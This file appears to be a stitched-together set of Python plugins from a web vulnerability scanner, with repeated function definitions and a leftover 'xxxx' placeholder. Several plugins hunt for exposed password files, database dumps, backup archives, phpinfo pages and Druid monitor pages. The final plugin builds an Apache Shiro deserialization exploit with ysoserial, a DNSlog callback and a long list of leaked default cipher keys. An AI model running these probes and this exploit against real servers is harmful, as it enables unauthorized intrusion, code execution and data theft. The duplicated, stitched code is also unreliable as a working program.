def SubdomainWorkbench(Url):
    """Queue the subdomain-search task for ``Url`` and run it on a thread pool.

    A fresh result list is created here and handed to the task through the
    ``SubdomainList`` keyword so that results can be collected in it. The list
    is local to this call and is not returned to the caller.
    """
    found_subdomains = []  # handed to the worker, which is expected to fill it
    pool = ThreadPool()  # pool dedicated to the subdomain search
    pool.Append(xxxx, Url=Url, SubdomainList=found_subdomains)
    pool.Start(5)  # fixed at 5 for now; meant to come from a config file later
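def medusa(**kwargs)->None:
    """Queue one ``task`` per candidate text-file path under ``Url`` and run the pool.

    Reads ``Url``, ``Headers``, ``Proxies``, ``Uid`` and ``Sid`` from
    ``kwargs``. Any exception raised while queuing or starting the pool is
    written to the error log instead of propagating.
    """
    Url = kwargs.get("Url")  # base URL the paths are appended to
    # Work on a copy: the Accept-* entries set below used to be written into
    # the caller's dict, which leaks into every other user of that dict.
    Headers = dict(kwargs.get("Headers") or {})
    proxies = kwargs.get("Proxies")  # proxy settings, passed through untouched
    payloads = [
        "/root.txt",
        "/db.txt",
        "/password.txt",
        "/username.txt",
        "/database.txt",
        "/1.txt",
        "/123.txt",
        "/a.txt",
    ]
    Pool = ThreadPool()
    Headers["Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
    Headers["Accept-Encoding"] = "gzip, deflate"

    try:
        for payload in payloads:
            # Plain concatenation: a trailing slash on Url yields "//".
            payload_url = Url + payload
            Pool.Append(
                task,
                Url=Url,
                headers=Headers,
                proxies=proxies,
                payload_url=payload_url,
                Uid=kwargs.get("Uid"),
                Sid=kwargs.get("Sid"),
            )
        Pool.Start(thread_number)  # run the queued tasks
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # str() keeps the handler from raising TypeError (and hiding the real
        # error) when the 'algroup' entry is missing.
        ErrorLog().Write("Plugin Name:" + str(plugin_name) + " ThreadPool ", e)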
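def medusa(**kwargs) -> None:
    """Queue one ``task`` per page under ``Url + '/druid'`` and run the pool.

    Reads ``Url``, ``Headers``, ``Proxies``, ``Uid`` and ``Sid`` from
    ``kwargs``. Any exception raised while queuing or starting the pool is
    written to the error log instead of propagating.
    """
    Url = kwargs.get("Url")  # base URL the paths are appended to
    # Work on a copy: the Accept-* entries set below used to be written into
    # the caller's dict, which leaks into every other user of that dict.
    Headers = dict(kwargs.get("Headers") or {})
    proxies = kwargs.get("Proxies")  # proxy settings, passed through untouched
    # Renamed from `list`, which shadowed the builtin inside this function.
    druid_pages = [
        '/index.html', '/datasource.html', '/sql.html', '/wall.html',
        '/webapp.html', '/weburi.html', '/websession.html', '/spring.html'
    ]
    Headers["Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
    Headers["Accept-Encoding"] = "gzip, deflate"

    Pool = ThreadPool()
    try:
        for page in druid_pages:
            payload_url = Url + '/druid' + page
            Pool.Append(task,
                        Url=Url,
                        headers=Headers,
                        proxies=proxies,
                        payload_url=payload_url,
                        Uid=kwargs.get("Uid"),
                        Sid=kwargs.get("Sid"))
        Pool.Start(thread_number)  # run the queued tasks
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # str() keeps the handler from raising TypeError (and hiding the real
        # error) when the 'algroup' entry is missing.
        ErrorLog().Write("Plugin Name:" + str(plugin_name) + " ThreadPool ", e)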
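def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Queue one ``task`` per candidate archive path under ``Url`` and run the pool.

    Two families of paths are queued: the host part of ``Url`` followed by
    each archive suffix, then every fixed name in ``payloads`` followed by
    each suffix. ``Uid`` and ``Sid`` are read from ``kwargs`` and forwarded.
    Any exception raised while queuing or starting the pool is written to the
    error log instead of propagating.
    """
    proxies = Proxies().result(proxies)
    # Only the host component is used below; scheme and port are discarded.
    _scheme, url, _port = UrlProcessing().result(Url)
    # NOTE(review): ".bz2 ", ".xz " and ".z " carry a trailing space. They are
    # kept byte-for-byte here; confirm whether that is intentional.
    suffixs = [
        ".zip", ".rar", ".tar.gz", ".tgz", ".7z", ".wim", ".lzh", ".cab",
        ".arj", ".lz4", ".db", ".gz", ".bz2 ", ".tar.bz2", ".xz ", ".tar.xz",
        ".z ", ".tar.z", ".zipx"
    ]
    payloads = [
        "/www.root",
        "/bbs",
        "/www",
        "/wwwroot",
        "/web",
        "/root",
        "/database",
        "/db",
        "/website",
        "/config_ucenter.php",
        "/config_global.php",
        "/1",
        "/123",
        "/a",
        "/新建文件夹",
    ]
    # Work on a copy: the Accept-* entries set below used to be written into
    # the caller's dict, which leaks into every other user of that dict.
    Headers = dict(Headers or {})
    Headers["Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
    Headers["Accept-Encoding"] = "gzip, deflate"

    Pool = ThreadPool()
    try:
        # (payload_url, file_name) pairs, in the original queuing order:
        # host-named archives first, then every fixed name with every suffix.
        candidates = [(Url + "/" + url + suffix, url + suffix)
                      for suffix in suffixs]
        candidates += [(Url + payload + suffix, payload + suffix)
                       for payload in payloads
                       for suffix in suffixs]
        for payload_url, file_name in candidates:
            Pool.Append(task,
                        url=url,
                        file_name=file_name,
                        headers=Headers,
                        proxies=proxies,
                        payload_url=payload_url,
                        Uid=kwargs.get("Uid"),
                        Sid=kwargs.get("Sid"))
        Pool.Start(thread_number)  # run the queued tasks
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # str() keeps the handler from raising TypeError (and hiding the real
        # error) when the 'algroup' entry is missing.
        ErrorLog().Write("Plugin Name:" + str(plugin_name) + " ThreadPool ", e)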
def MedusaScan(WebScanUrl, WebScanUserToken, WebScanModule, WebScanThreads,
               WebScanAgentHeader):
    """Resolve the request headers, let ``WebScan`` fill a pool, then run it.

    The pool is started with ``WebScanThreads`` only when ``WebScan`` returns
    a truthy value; otherwise nothing is run.
    """
    pool = ThreadPool()
    # The literal string "false" means no header was chosen; AgentHeader is
    # then asked for "None" instead.
    header_choice = "None" if WebScanAgentHeader == "false" else WebScanAgentHeader
    header_values = AgentHeader().result(header_choice)

    queued = WebScan(pool, WebScanUrl, header_values, WebScanUserToken,
                     WebScanModule)
    if not queued:
        return
    pool.Start(WebScanThreads)  # run the queued tasks
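def MedusaScan(Url,Module,ScanThreads,Values,proxies,**kwargs):
    """Let the selected module(s) queue work on a pool, then start the pool.

    ``Module`` is either ``"all"`` (every entry of ``MedusaVulnerabilityList``
    is called) or the key of a single entry. The pool is started with
    ``ScanThreads`` in both cases, even when the single-module call failed.
    """
    ScanThreadPool = ThreadPool()
    if Module == "all":
        for module_name in MedusaVulnerabilityList:
            MedusaVulnerabilityList[module_name](ScanThreadPool, Url, Values, proxies, **kwargs)
    else:
        try:
            # Module arrives as a caller-supplied string and is used only as a
            # lookup key into the registry, never evaluated.
            MedusaVulnerabilityList[Module](ScanThreadPool, Url, Values, proxies, **kwargs)
        except Exception:
            # An unknown module name lands here, as does any error raised by
            # the module itself. Narrowed from a bare `except:` so that
            # KeyboardInterrupt and SystemExit are no longer swallowed.
            pass
    ScanThreadPool.Start(ScanThreads)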
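def MedusaScan(Url, Token, Module, WebScanThreads, Values):
    """Let the selected module(s) queue work on a pool, then start the pool.

    ``Module`` is either ``"all"`` (every entry of ``MedusaVulnerabilityList``
    is called) or the key of a single entry. For a single module the pool is
    started only if the module call succeeded.
    """
    WebScanThreadPool = ThreadPool()
    if Module == "all":
        for module_name in MedusaVulnerabilityList:
            MedusaVulnerabilityList[module_name](WebScanThreadPool, Url,
                                                 Values, Token)
        WebScanThreadPool.Start(WebScanThreads)
    else:
        try:
            # Module arrives as a caller-supplied string and is used only as a
            # lookup key into the registry, never evaluated.
            MedusaVulnerabilityList[Module](WebScanThreadPool, Url, Values,
                                            Token)
            WebScanThreadPool.Start(WebScanThreads)
        except Exception:
            # An unknown module name lands here, as does any error raised by
            # the module or by starting the pool. Narrowed from a bare
            # `except:` so that KeyboardInterrupt and SystemExit are no longer
            # swallowed.
            pass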
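def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
    """Queue one ``task`` per page under ``Url + '/druid'`` and run the pool.

    The request headers are built locally from ``RandomAgent``; ``Uid`` and
    ``Sid`` are read from ``kwargs`` and forwarded. Any exception raised while
    queuing or starting the pool is written to the error log instead of
    propagating.
    """
    proxies = Proxies().result(proxies)
    # Renamed from `list`, which shadowed the builtin inside this function.
    druid_pages = ['/index.html', '/datasource.html', '/sql.html', '/wall.html', '/webapp.html', '/weburi.html',
                   '/websession.html', '/spring.html']
    headers = {
        'User-Agent': RandomAgent,
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
    }
    Pool = ThreadPool()
    try:
        for page in druid_pages:
            payload_url = Url + '/druid' + page
            Pool.Append(task,
                        Url=Url,
                        headers=headers,
                        proxies=proxies,
                        payload_url=payload_url,
                        Uid=kwargs.get("Uid"),
                        Sid=kwargs.get("Sid"))
        Pool.Start(thread_number)  # run the queued tasks
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # str() keeps the handler from raising TypeError (and hiding the real
        # error) when the 'algroup' entry is missing.
        ErrorLog().Write("Plugin Name:" + str(plugin_name) + " ThreadPool ", e)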
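def medusa(**kwargs) -> None:
    """Queue one ``task`` per candidate PHP page under ``Url`` and run the pool.

    Reads ``Url``, ``Headers``, ``Proxies``, ``Uid`` and ``Sid`` from
    ``kwargs``. Any exception raised while queuing or starting the pool is
    written to the error log instead of propagating.
    """
    url = kwargs.get("Url")  # base URL the paths are appended to
    # Work on a copy: the Accept-* entries set below used to be written into
    # the caller's dict, which leaks into every other user of that dict.
    Headers = dict(kwargs.get("Headers") or {})
    proxies = kwargs.get("Proxies")  # proxy settings, passed through untouched
    # Renamed from `list`, which shadowed the builtin inside this function.
    php_pages = [
        '/index.php', '/1.php', '/2.php', '/3.php', '/4.php', '/5.php',
        '/6.php', '/7.php', '/8.php', '/9.php', '/10.php', '/11.php',
        '/12.php', '/13.php', '/123.php', '/1234.php', '/12345.php',
        '/123456.php', '/a.php', '/b.php', '/c.php', '/d.php', '/e.php',
        '/f.php', '/g.php', '/h.php', '/i.php', '/j.php', '/k.php', '/l.php',
        '/m.php', '/n.php', '/o.php', '/p.php', '/q.php', '/r.php', '/s.php',
        '/t.php', '/u.php', '/v.php', '/w.php', '/x.php', '/y.php', '/z.php',
        '/php.php', '/abc.php', '/test.php', '/test1.php', '/test2.php',
        '/test3.php', '/test123.php', '/info.php', '/phpinfo.php',
        '/iProber.php', '/iProber1.php', '/iProber2.php', '/iProber3.php',
        '/test_phpinfo.php', '/tools/info.php', '/ship/phpinfo.php',
        '/web/info.php', '/web/phpinfo.php', '/xampp/info.php',
        '/xampp/phpinfo.php', '/index.php?act=phpinfo',
        '/dashboard/phpinfo.php'
    ]
    Pool = ThreadPool()
    Headers["Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
    Headers["Accept-Encoding"] = "gzip, deflate"

    try:
        for page in php_pages:
            payload_url = url + page
            Pool.Append(task,
                        Url=url,
                        headers=Headers,
                        proxies=proxies,
                        payload_url=payload_url,
                        Uid=kwargs.get("Uid"),
                        Sid=kwargs.get("Sid"))
        Pool.Start(thread_number)  # run the queued tasks
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # str() keeps the handler from raising TypeError (and hiding the real
        # error) when the 'algroup' entry is missing.
        ErrorLog().Write("Plugin Name:" + str(plugin_name) + " ThreadPool ", e)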
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Queue one ``task`` per hard-coded cipher key and run the pool.

    For every entry of ``CipherKey`` a Java helper is run, its output is
    padded to the AES block size, and a ``task`` is queued with that body, the
    key, the AES mode and IV, and a ``Dnslog`` instance. ``Uid`` and ``Sid``
    are read from ``kwargs`` and forwarded. Any exception raised while
    preparing or starting the pool is written to the error log instead of
    propagating. ``Headers`` is accepted but not used in this function.
    """

    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's standard port when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        # NOTE(review): self-assignment, has no effect.
        port = port
    ExpClass = "JRMPClient"  # passed as an argument to the jar invoked below
    # Candidate keys, tried one per queued task.
    # NOTE(review): these look like default or publicly circulated keys,
    # presumably for a remember-me style cookie cipher. Confirm provenance.
    # A deployment whose key appears in a list like this should replace it
    # with a randomly generated, per-installation key.
    CipherKey = [
        "kPH+bIxk5D2deZiIxcaaaA==",
        "2AvVhdsgUs0FSA3SDFAdag==",
        "3AvVhmFLUs0KTA3Kprsdag==",
        "4AvVhmFLUs0KTA3Kprsdag==",
        "5AvVhmFLUs0KTA3Kprsdag==",
        "5aaC5qKm5oqA5pyvAAAAAA==",
        "6ZmI6I2j5Y+R5aSn5ZOlAA==",
        "bWljcm9zAAAAAAAAAAAAAA==",
        "wGiHplamyXlVB11UXWol8g==",
        "Z3VucwAAAAAAAAAAAAAAAA==",
        "MTIzNDU2Nzg5MGFiY2RlZg==",
        "U3ByaW5nQmxhZGUAAAAAAA==",
        "fCq+/xW488hMTCD+cmJ3aQ==",
        "1QWLxg+NYmxraMoxAXu/Iw==",
        "ZUdsaGJuSmxibVI2ZHc9PQ==",
        "L7RioUULEFhRyxM7a2R/Yg==",
        "r0e3c16IdVkouZgk1TKVMg==",
        "bWluZS1hc3NldC1rZXk6QQ==",
        "a2VlcE9uR29pbmdBbmRGaQ==",
        "WcfHGU25gNnTxTlmJMeSpw==",
        "OY//C4rhfwNxCQAQCrQQ1Q==",
        "5J7bIJIV0LQSN3c9LPitBQ==",
        "f/SY5TIve5WWzT4aQlABJA==",
        "bya2HkYo57u6fWh5theAWw==",
        "WuB+y2gcHRnY2Lg9+Aqmqg==",
        "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN",
        "3qDVdLawoIr1xFd6ietnwg==",
        "ZWvohmPdUsAWT3=KpPqda",
        "YI1+nBV//m7ELrIyDHm6DQ==",
        "6Zm+6I2j5Y+R5aS+5ZOlAA==",
        "2A2V+RFLUs+eTA3Kpr+dag==",
        "6ZmI6I2j3Y+R1aSn5BOlAA==",
        "SkZpbmFsQmxhZGUAAAAAAA==",
        "2cVtiE83c4lIrELJwKGJUw==",
        "fsHspZw/92PrS3XrPW+vxw==",
        "XTx6CKLo/SdSgub+OPHSrw==",
        "sHdIjUN6tzhl8xZMG3ULCQ==",
        "O4pdf+7e+mZe8NyxMTPJmQ==",
        "HWrBltGvEZc14h9VpMvZWw==",
        "rPNqM6uKFCyaL10AK51UkQ==",
        "Y1JxNSPXVwMkyvES/kJGeQ==",
        "lT2UvDUmQwewm6mMoiw4Ig==",
        "MPdCMZ9urzEA50JDlDYYDg==",
        "xVmmoltfpb8tTceuT5R7Bw==",
        "c+3hFGPjbgzGdrC+MHgoRQ==",
        "ClLk69oNcA3m+s0jIMIkpg==",
        "Bf7MfkNR0axGGptozrebag==",
        "1tC/xrDYs8ey+sa3emtiYw==",
        "ZmFsYWRvLnh5ei5zaGlybw==",
        "cGhyYWNrY3RmREUhfiMkZA==",
        "IduElDUpDDXE677ZkhhKnQ==",
        "yeAAo1E8BOeAYfBlm4NG9Q==",
        "cGljYXMAAAAAAAAAAAAAAA==",
        "2itfW92XazYRi5ltW0M2yA==",
        "XgGkgqGqYrix9lI6vxcrRw==",
        "ertVhmFLUs0KTA3Kprsdag==",
        "5AvVhmFLUS0ATA4Kprsdag==",
        "s0KTA3mFLUprK4AvVhsdag==",
        "hBlzKg78ajaZuTE0VLzDDg==",
        "9FvVhtFLUs0KnA3Kprsdyg==",
        "d2ViUmVtZW1iZXJNZUtleQ==",
        "yNeUgSzL/CfiWw1GALg6Ag==",
        "NGk/3cQ6F5/UNPRh8LpMIg==",
        "4BvVhmFLUs0KTA3Kprsdag==",
        "MzVeSkYyWTI2OFVLZjRzZg==",
        "CrownKey==a12d/dakdad",
        "empodDEyMwAAAAAAAAAAAA==",
        "A7UzJgh1+EWj5oBFi+mSgw==",
        "YTM0NZomIzI2OTsmIzM0NTueYQ==",
        "c2hpcm9fYmF0aXMzMgAAAA==",
        "i45FVt72K2kLgvFrJtoZRw==",
        "U3BAbW5nQmxhZGUAAAAAAA==",
        "ZnJlc2h6Y24xMjM0NTY3OA==",
        "Jt3C93kMR9D5e8QzwfsiMw==",
        "MTIzNDU2NzgxMjM0NTY3OA==",
        "vXP33AonIp9bFwGl7aT7rA==",
        "V2hhdCBUaGUgSGVsbAAAAA==",
        "Z3h6eWd4enklMjElMjElMjE=",
        "Q01TX0JGTFlLRVlfMjAxOQ==",
        "ZAvph3dsQs0FSL3SDFAdag==",
        "Is9zJ3pzNh2cgTHB4ua3+Q==",
        "NsZXjXVklWPZwOfkvk6kUA==",
        "GAevYnznvgNCURavBhCr1w==",
        "66v1O8keKNV3TTcGPK1wzg==",
        "SDKOLKn2J1j/2BHjeZwAoQ==",
    ]
    BLOCK_SIZE = AES.block_size
    # Pads bytes up to the next multiple of BLOCK_SIZE; every pad byte holds
    # the pad length, and an already-aligned input gains one full block.
    PAD_FUNC = lambda s: s + ((BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(
        BLOCK_SIZE - len(s) % BLOCK_SIZE)).encode()
    AES_MODE = AES.MODE_CBC
    # The 16 bytes of one random UUID serve as the IV; it is generated once
    # and the same value is handed to every queued task.
    AES_IV = uuid.uuid4().bytes
    payload_url = scheme + "://" + url + ":" + str(port)
    YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
    Pool = ThreadPool()
    try:
        for key in CipherKey:
            DL = Dnslog()  # a fresh instance per key, forwarded to the task
            # Argument-list form, so no shell parses these values.
            # NOTE(review): the child is never waited on, its stdout pipe is
            # never closed and its exit status is not checked, so a failed run
            # still has its (possibly empty) output padded and queued.
            popen = subprocess.Popen(
                ["java", "-jar", YsoserialPath, ExpClass,
                 DL.dns_host()],
                stdout=subprocess.PIPE)
            file_body = PAD_FUNC((popen).stdout.read())
            Pool.Append(task,
                        Pool=Pool,
                        url=url,
                        file_body=file_body,
                        key=key,
                        AES_MODE=AES_MODE,
                        AES_IV=AES_IV,
                        payload_url=payload_url,
                        DL=DL,
                        proxies=proxies,
                        Uid=kwargs.get("Uid"),
                        Sid=kwargs.get("Sid"))
        Pool.Start(20)  # start the thread pool with a fixed count of 20
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        # NOTE(review): if 'algroup' is missing, `_` is None and this
        # concatenation raises TypeError inside the handler.
        ErrorLog().Write("Plugin Name:" + _ + " ThreadPool ",
                         e)  # write the plugin name and the error to the log